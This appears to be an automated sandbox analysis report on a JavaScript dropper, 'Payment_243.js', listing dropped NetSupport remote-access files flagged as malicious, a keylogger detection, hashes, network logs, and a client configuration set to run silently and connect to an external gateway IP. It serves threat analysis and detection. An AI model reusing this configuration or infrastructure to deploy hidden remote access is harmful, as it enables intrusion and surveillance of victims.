                                                                                            SHA-512:F0E26AA63B0C7F1B31074B9D6EEF88D0CFBC467F86B12205CB539A45B0352E77CE2F99F29BAEAB58960A197714E72289744143BA17975699D058FE75D978DFD0
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:1200..0x3ca968c5....[[Enforce]]....[_License]..control_only=0..expiry=01/01/2028..inactive=0..licensee=XMLCTL..maxslaves=9999..os2=1..product=10..serial_no=NSM303008..shrink_wrap=0..transport=0..
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:Generic INItialization configuration [Features]
                                                                                            Category:dropped
                                                                                            Size (bytes):6458
                                                                                            Entropy (8bit):4.645519507940197
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                                            MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                                            SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                                            SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                                            SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                                            Malicious:false
                                                                                            Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):18808
                                                                                            Entropy (8bit):6.292094060787929
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
                                                                                            MD5:104B30FEF04433A2D2FD1D5F99F179FE
                                                                                            SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                                                                                            SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                                                                            SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\i99ekubc\PCICHEK.DLL, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 18%
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):3740024
                                                                                            Entropy (8bit):6.527276298837004
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
                                                                                            MD5:D3D39180E85700F72AAAE25E40C125FF
                                                                                            SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
                                                                                            SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
                                                                                            SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\ProgramData\i99ekubc\PCICL32.DLL, Author: Joe Security
                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\i99ekubc\PCICL32.DLL, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 18%
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):396664
                                                                                            Entropy (8bit):6.80911343409989
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:HqArkLoM/5iec2yxvUh3ho2LDnOQQ1k3+h9APjbom/n6:ekuK2XOjksobom/n6
                                                                                            MD5:2C88D947A5794CF995D2F465F1CB9D10
                                                                                            SHA1:C0FF9EA43771D712FE1878DBB6B9D7A201759389
                                                                                            SHA-256:2B92EA2A7D2BE8D64C84EA71614D0007C12D6075756313D61DDC40E4C4DD910E
                                                                                            SHA-512:E55679FF66DED375A422A35D0F92B3AC825674894AE210DBEF3642E4FC232C73114077E84EAE45C6E99A60EF4811F4A900B680C3BF69214959FA152A3DFBE542
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\i99ekubc\TCCTL32.DLL, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):103824
                                                                                            Entropy (8bit):6.674952714045651
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:q78j0+RH6e6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDU:qwpHLiLniepfxP91/bQxnu
                                                                                            MD5:C4F1B50E3111D29774F7525039FF7086
                                                                                            SHA1:57539C95CBA0986EC8DF0FCDEA433E7C71B724C6
                                                                                            SHA-256:18DF68D1581C11130C139FA52ABB74DFD098A9AF698A250645D6A4A65EFCBF2D
                                                                                            SHA-512:005DB65CEDAACCC85525FB3CDAB090054BB0BB9CC8C37F8210EC060F490C64945A682B5DD5D00A68AC2B8C58894B6E7D938ACAA1130C1CC5667E206D38B942C5
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\i99ekubc\client32.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 32%
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):676
                                                                                            Entropy (8bit):5.438750337777859
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:XWJxS2hz7YU+Sj8ZGShR8kkivlnxOZ7+DP981E7GXoKIDWQCYnmSu+L8AR:XWJI2hzEPI8ZNR8pivlnxOoG1fXtID/F
                                                                                            MD5:95C974137591C8018AC92DEA29AA416C
                                                                                            SHA1:E0808277D7FED2B4DB1176FA4FA79DA420BFD865
                                                                                            SHA-256:7F92999396927D24370F6FE3D2E8EA408C9917D34F42C0205EA3F3296B6C04F4
                                                                                            SHA-512:767AE7FFCA47BB8F8170C44C66EEBF9623412A5D2E07D67FC3FCF1AB5F6CE49C08A68D91E00EBD0B52C052AD5454E57B16A28BAED8B1E0B2C585448EAE8AE1E0
                                                                                            Malicious:false
                                                                                            Preview:0x33b1a391....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableManageServices=0..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..GatewayAddress=185.157.213.71:443..gsk=FI:N>AABED9I<L?N..gskmode=0..GSK=FI:N>AABED9I<L?N..GSKX=FI:N>AABED9I<L?N..
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):576
                                                                                            Entropy (8bit):3.74490007255712
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:bHCsUaXhIi90pgIJKlkQIkzDTze/W2rXJ0cl/7:biERIiMdMkvkm/WgXW07
                                                                                            MD5:0DDC9B893EA3AF54D152F94410653A9D
                                                                                            SHA1:3C7E16964DFFD7342AE931E38E00F67DC0E4C307
                                                                                            SHA-256:0128461FAC52A5DEEC5B0F0410928E0C2AFC1AB710990BDEDEA47A68EB5ECC3D
                                                                                            SHA-512:24463708FBDACFF90FCB4964A6335687D8EEB49094E6154D0AA37FD9E8DE7D870396E424756465F4F86EDF0BAA6138B7F52035559A04FB243C29D42395AE92A2
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1696
                                                                                            Entropy (8bit):4.244464042583567
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:bixIiMdMA/JWo/XkWHUVyHBF+J4X8XRL1g:bi4MQgW8yByv
                                                                                            MD5:3E4B8369C88B5B5561EF39F297AE5B7E
                                                                                            SHA1:128D40127E1BCD1DC3A26DF7ED685AD95482F2EA
                                                                                            SHA-256:3774458149778D9527E0A9ACE07B42EF609F0BB1E856E6C2DFD0B7CBD8B09F73
                                                                                            SHA-512:65C3DC909AA69121EF46A79D8F62D234D69B5856796FDD5F4AE4FC030BC0FB953175577CC34B41B38E2C39D44CBCB97DD34628C074B74C189CFD522B57602F2C
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):344
                                                                                            Entropy (8bit):3.4385863420423908
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:bHCsLlXj9IiIwkttBtw++CMwCkXxL4bM5/zGJOg4lTQwlroL:bHCsRXhIiq50pgIJKlkQY
                                                                                            MD5:1B7CDDDFB06152AE01F12D9F253237D6
                                                                                            SHA1:1EF358781A086A0727F4FA95CD53510EB328BC52
                                                                                            SHA-256:FD668D6EDCF6B6CC176EDD9BF7B0D7F1881FE2F0D94EBAE656127C27A359550E
                                                                                            SHA-512:4705C93B233BE92DD2D04649D404B538BC76607BBE655D5E35A739653AC1AF776ECDD12EC1CBF81476070EC5BAE633F891817155014730A06939EFB21BD132EA
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):24910
                                                                                            Entropy (8bit):5.246760185320695
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:PlBJHEA29f27X0JS4zuPxpO8psP+E7v6xKL:P9b29f27kJSAuPxpO6sP+E7yxKL
                                                                                            MD5:8028AB84D61FC5E00FEEA816E1D1E293
                                                                                            SHA1:73F6340BE4C6B5AF09673DACDF1AAB7405B966AA
                                                                                            SHA-256:3F2EB6455F54365C27829F85DD64CA0BAFAA8577A6C8E79A54A6DD4C67DF6470
                                                                                            SHA-512:276DF846F72F2B410852F0709F3EFFD853C3B012E94A6A3DFFB364F9597D4CCFE453B6533CE7A67C9DCE5B829C0F96E9838A267269687213D996B60591C586F0
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="utf-8" standalone="yes"?>..<WindowsPerformanceRecorder Version="1.0" Author="Microsoft Corporation" Comments="MF tracing profile" Company="Microsoft Corporation" Copyright="Microsoft Corporation" Tag="MFTrace">.. <Profiles>.. <EventCollector Id="EventCollector_Camera_MF_Trace" Name="MFTrace Event Collector">.. <BufferSize Value="1024" />.. <Buffers Value="3" PercentageOfTotalMemory="true" MaximumBufferSpace="192" />.. </EventCollector>.. <EventProvider Id="AuthUX_1" Name="3ec987dd-90e6-5877-ccb7-f27cdf6a976b" />.. <EventProvider Id="AuthUX_2" Name="41ad72c3-469e-5fcf-cacf-e3d278856c08" />.. <EventProvider Id="AuthUX_3" Name="4f7c073a-65bf-5045-7651-cc53bb272db5" />.. <EventProvider Id="AuthUX_4" Name="a6c5c84d-c025-5997-0d82-e608d1abbbee" />.. <EventProvider Id="AuthUX_5" Name="c0ac3923-5cb1-5e37-ef8f-ce84d60f1c74" />.. <EventProvider Id="AuthUX_6" Name="df350158-0f8f-555d-7e4f-f1151ed14299" />.. <EventProvider Id="Aut
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):291
                                                                                            Entropy (8bit):4.678249360262278
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:jN+SboYZlqqRQJOBF1Fi9MO8jCaMbNW7KuW/4kutLwyAGI/V6s:jN+oo6lqqRNhFi9MO6EW7XFVLqGO6s
                                                                                            MD5:708428751D01199ED5F53E0FB2AD4BF0
                                                                                            SHA1:93F563A090F7EE511D8774C8AF4F8FF46F0D66E6
                                                                                            SHA-256:579032CB7B7BEA083E077BA85CB62DC231BA672F93CE1B55A379968FB3C2CEE9
                                                                                            SHA-512:4A75EEAA2A973D7F726DD10E7769A22E9FDD084D9EC8A1CBA742FBB66F0A6A6343421C9FDF58C61B91920D2F3DCC99C705A2844D33B53F8FCF3D38A909B5A00B
                                                                                            Malicious:false
                                                                                            Preview:// Dictionary of default apps to install into new profiles. They will be.// dynamically downloaded and installed from CWS on profile creation..{. // Drive extension. "ghbmnnjooekpmoecnnnilnnbdlolhkhi" : {. "external_update_url": "https://clients2.google.com/service/update2/crx". }.}..
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):46460
                                                                                            Entropy (8bit):7.996244892825645
                                                                                            Encrypted:true
                                                                                            SSDEEP:768:8fAM/r+Jh0uwbtWlaaN6+H+aL6FsMSWGuPOLGIankYdaEqT4pKAdzSag3ZQr7WqM:8DrKh3wblLlJVzGykYdaC1WYWqGh
                                                                                            MD5:D224C335C82ACAA733441CE43E59C881
                                                                                            SHA1:FFC9502870FFBC116A44AE491306B7F6903D25B8
                                                                                            SHA-256:F3E8FF2CA65192446A62D85B75C8C75C105CFBB7B17A8FA67F9A0C6E87EF3EC0
                                                                                            SHA-512:D57A7902B2003B751796F2CFA1BFE4AD90A393BB1F68CE354B6D24B749937469AA8FBEE77838FC6BFFD83DC13D799C8C078783FFE236A1558B8900F71AFFAFE5
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):125324
                                                                                            Entropy (8bit):7.998476693287313
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:M+uqGKz72juA1+hbRI2QG6Btjjo6fiZZ86cNdbt:M+uqdvZndRIZPE6scN
                                                                                            MD5:74C052D8AF6C37EBA1FBF76663A8522E
                                                                                            SHA1:9315AE6AEB3E913F053D53A1F7EA1A29692E90E7
                                                                                            SHA-256:5110690167DBB46389FF5792EB2672ED41EA5983382207D1E365C4634E620B7E
                                                                                            SHA-512:A8ACA06CAF290F879E8DAA672A681D53F191E8F03C90BAFB49856616248205B33A8C466DC25D81FE215F0D66E42F2D7221075250B3BE6C4299491CCAFDE08220
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):21184
                                                                                            Entropy (8bit):6.98505637818331
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:9OMw3zdp3bwjGjue9/0jCRrndbVW2hWKgbCA0GftpBjbQywPAOll7PedGGZ:9OMwBprwjGjue9/0jCRrndbzM8iFFGkt
                                                                                            MD5:3B9D034CA8A0345BC8F248927A86BF22
                                                                                            SHA1:95FAF5007DAF8BA712A5D17F865F0E7938DA662B
                                                                                            SHA-256:A7AC7ECE5E626C0B4E32C13299E9A44C8C380C8981CE4965CBE4C83759D2F52D
                                                                                            SHA-512:04F0830878E0166FFD1220536592D0D7EC8AACD3F04340A8D91DF24D728F34FBBD559432E5C35F256D231AFE0AE926139D7503107CEA09BFD720AD65E19D1CDC
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:ASCII text, with CRLF, LF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1794
                                                                                            Entropy (8bit):3.5509498109363986
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:eCrjdMrTm893chS4Mw2n1iFotb496fjCuTiBCVXTbzVHeEVt:/rS0EQn8bB+EVt
                                                                                            MD5:3F78A0569C858AD26452633157103095
                                                                                            SHA1:8119BCC1D66B17CCD286FEF396FA48594188C4D0
                                                                                            SHA-256:D53FC339533D39F413DDD29A69ADE19F2972383DB8FB8938D77D2E79C8573F36
                                                                                            SHA-512:89842E39703970108135D71CE4C039DF19C18F04C280CB2516409758F9D22E0205567B08DBE527A6FB7C295BDA2EA8EE6A368D6FCAF6FB59645D31EF2243AD3D
                                                                                            Malicious:false
                                                                                            Preview://353b2d6049dd2f0998bdd73f13855b290ad0be89f62d61dbc2672253e4fb72da.{.. "install": {.. "clids": {.. "clid1": {.. "clid": "1985548",.. "vid": "225".. },.. "clid10": {.. "clid": "1985553",.. "vid": "225".. },.. "clid100004": {.. "clid": "1985555",.. "vid": "225".. },.. "clid1010": {.. "clid": "2372823",.. "vid": "".. },.. "clid15": {.. "clid": "1985554",.. "vid": "225".. },.. "clid21": {.. "clid": "2372816",.. "vid": "".. },.. "clid25": {.. "clid": "2372817",.. "vid": "".. },.. "clid28": {.. "clid": "2372813",.. "vid": "".. },.. "clid29": {.. "clid": "2372821",.. "vid": "".. },.. "clid30": {.. "clid": "2372822",.. "v
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):773968
                                                                                            Entropy (8bit):6.901559811406837
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                            MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                            SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                            SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                            SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:Windows setup INFormation
                                                                                            Category:dropped
                                                                                            Size (bytes):328
                                                                                            Entropy (8bit):4.93007757242403
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                            MD5:26E28C01461F7E65C402BDF09923D435
                                                                                            SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                            SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                            SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                            Malicious:false
                                                                                            Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):46
                                                                                            Entropy (8bit):4.532048032699691
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                                            MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                                            SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                                            SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                                            SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                                            Malicious:false
                                                                                            Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):33144
                                                                                            Entropy (8bit):6.7376663312239256
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:JFvNhAyi5hHA448qZkSn+EgT8ToDXTVi0:JCyoHA448qSSzgIQb
                                                                                            MD5:34DFB87E4200D852D1FB45DC48F93CFC
                                                                                            SHA1:35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
                                                                                            SHA-256:2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
                                                                                            SHA-512:F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\i99ekubc\pcicapi.dll, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 16%
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):63864
                                                                                            Entropy (8bit):6.446503462786185
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:Tf6fvDuNcAjJMBUHYBlXU1wT2JFqy9BQhiK:D6f7cjJ4U4I1jFqy92hiK
                                                                                            MD5:6FCA49B85AA38EE016E39E14B9F9D6D9
                                                                                            SHA1:B0D689C70E91D5600CCC2A4E533FF89BF4CA388B
                                                                                            SHA-256:FEDD609A16C717DB9BEA3072BED41E79B564C4BC97F959208BFA52FB3C9FA814
                                                                                            SHA-512:F9C90029FF3DEA84DF853DB63DACE97D1C835A8CF7B6A6227A5B6DB4ABE25E9912DFED6967A88A128D11AB584663E099BF80C50DD879242432312961C0CFE622
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):265816
                                                                                            Entropy (8bit):6.521007214956242
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:MW218gr7s2yIHB0pTPdTX9zUbEbStE97zjAs1RtTcJTfIv0se7POWu/HgsGU1VTl:MWSfr7sXSmPDbKPJ6/AsNk+1x
                                                                                            MD5:49C51ACE274D7DB13CAA533880869A4A
                                                                                            SHA1:B539ED2F1A15E2D4E5C933611D736E0C317B8313
                                                                                            SHA-256:1D6407D7C7FFD2642EA7F97C86100514E8E44F58FF522475CB42BCC43A1B172B
                                                                                            SHA-512:13440009E2F63078DCE466BF2FE54C60FEB6CEDEED6E9E6FC592189C50B0780543C936786B7051311089F39E9E3CCB67F705C54781C4CAE6D3A8007998BEFBF6
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):880216
                                                                                            Entropy (8bit):5.239371133407635
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:vTAPYZEyRr+NDnaLyx2lz8MSjtX08pYRc29qcQmsGahsQZsbRN9S:YYF+Eyx2lzujtEIYRc1cQmsGa7ON9S
                                                                                            MD5:642DC7E57F0C962B9DB4C8FB346BC5A7
                                                                                            SHA1:ACEE24383B846F7D12521228D69135E5704546F6
                                                                                            SHA-256:63B4B5DB4A96A8ABEC82B64034F482B433CD4168C960307AC5CC66D2FBF67EDE
                                                                                            SHA-512:FB163A0CE4E3AD0B0A337F5617A7BF59070DF05CC433B6463384E8687AF3EDC197E447609A0D86FE25BA3EE2717FD470F2620A8FC3A2998A7C3B3A40530D0BAE
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                            Category:dropped
                                                                                            Size (bytes):2845498
                                                                                            Entropy (8bit):7.997717653428638
                                                                                            Encrypted:true
                                                                                            SSDEEP:49152:b7X1ZldlEDThXBJOhHyx6J6h2SFFGf0RBNTQfYc9jh23eWeB3/YSBm7WIqRpykTo:X1wFXa4hRFY89YYc9jh23redpmQRZCP7
                                                                                            MD5:4C1AFE882E6D7C945A8397DCB02A2478
                                                                                            SHA1:85BA754BB1515A1EDC4054A8A3396C238DCE2B7E
                                                                                            SHA-256:67F6FC03CD53FB2A5AB17B97CAAE29B4FD0E0AFB7ADF4C9C64CDB2F7F99D03D4
                                                                                            SHA-512:A1778AE5F89DBBC57AC70C8A8B1CC419DFE015C7F9C9A58AC9957AB3723EDF812A4681CAF167EC63D0EA571448DC01FE01E5B12C5538C98B6BA404CAD2F79B0F
                                                                                            Malicious:false
                                                                                            File type:ASCII text
                                                                                            Entropy (8bit):5.508101926235647
                                                                                            TrID:
                                                                                              File name:Payment_243.js
                                                                                              File size:5'736'023 bytes
                                                                                              MD5:19cef6a2f4055703922f3e8fd2c92fb9
                                                                                              SHA1:e6ccef88b3cbba0424a39edab01697716fd8d813
                                                                                              SHA256:d0480e3927154036684ba2a60dba9576234bae2aa484294c3d925923de55196f
                                                                                              SHA512:0976d92c923aa47d9667c8881f32217fa78ca8b60ed7963adf332ce3874699abc69d86610a25d51f228e6fd801e9358bc22ec1e06dfb2fa32b9efaa153c53b54
                                                                                              SSDEEP:49152:v7DIzjCxbxqHlpM1MNN0D6hO22DzhYzYBmv9+8pJm3hp/KP1G6C+3qUxc8g7cEXQ:C
                                                                                              TLSH:70465A0DAEF70091A923313C8FAF680AB674801B1509DD147D9DA3945FA953867FEFE8
                                                                                              File Content Preview:./*.* Licensed to the Apache Software Foundation (ASF) under one.* or more contributor license agreements. See the NOTICE file.* distributed with this work for additional information.* regarding copyright ownership. The ASF licenses this file.* to you u
                                                                                              Icon Hash:68d69b8bb6aa9a86
                                                                                              Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                              2025-01-14T16:25:36.126119+0100 | 1810004 | Joe Security ANOMALY Microsoft Office HTTP activity | 1 | 192.168.2.22 | 49163 | 45.155.249.215 | 80 | TCP
                                                                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                              Jan 14, 2025 16:25:37.523772955 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.523781061 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.523785114 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.523801088 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.523809910 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.523818016 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.523833036 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.523837090 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.523844957 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.523859024 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:37.523870945 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:37.523880959 CET4916380192.168.2.2245.155.249.215
